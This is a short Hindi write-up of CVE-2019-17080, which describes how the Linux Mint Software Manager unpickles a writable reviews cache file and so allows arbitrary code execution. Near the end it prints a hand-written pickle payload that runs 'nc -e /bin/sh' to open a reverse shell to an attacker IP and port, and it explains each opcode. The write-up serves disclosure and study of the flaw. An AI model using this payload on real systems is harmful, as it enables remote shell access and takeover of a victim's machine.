
CVE-2019-17080
Linux mint सॉफ्टवेयर प्रबंधक (v 7.9.5/9) गलत कॉन्फ़िगरेशन के कारण हमें ऑब्जेक्ट इंजेक्शन और मनमाना कोड निष्पादित करने का कारण बनता है।
mintinsall
Mint सॉफ्टवेयर प्रबंधक चलाने पर यह जाँचता है कि कोई नई टिप्पणी है या नहीं। यदि कोई नई टिप्पणी है, तो new-reviews.list से डाउनलोड करके फ़ाइल में लिखता है।

code mintinstall.py
सॉफ्टवेयर प्रबंधक प्रारंभ होने पर, यह reviews मॉड्यूल से ReviewCache() क्लास को कॉल करता है।

code reviews.py
ReviewCache क्लास प्रारंभ होने पर (init) यह _load_cache() फ़ंक्शन को कॉल करता है।

Load cache फ़ंक्शन REVIEWS_CACHE वेरिएबल में फ़ाइल को पढ़ता है और pickle मॉड्यूल की सहायता से फ़ाइल के अंदर डेटा को unserialize करता है और कुछ मानों को मेमोरी में रखता है।

फ़ाइल की जाँच करने पर यह देखा गया कि मेरे पास लिखने की अनुमति है।

Pickle मॉड्यूल की सहायता से serialize/unserialize संचालन कर सकते हैं, इसलिए reduce विधि का उपयोग करके मॉड्यूल शामिल करके मनमाना कोड निष्पादित कर सकते हैं।

इस स्थिति में, यदि फ़ाइल को unserialize करने का प्रयास किया जाता है, तो हमारा दुर्भावनापूर्ण कोड चलेगा।
cos
system
(S'nc -e /bin/sh 192.168.2.138 4545'
tR.
>>मॉड्यूल नाम c{os}
>> फ़ंक्शन
( >> मार्कर ऑब्जेक्ट
S >> उद्धरण चिह्न के अंत तक पढ़कर स्टैक पर डालें
tR. >> स्टैक पर मौजूद चीज़ों को कॉल करें और परिणाम को स्टैक पर रखें।

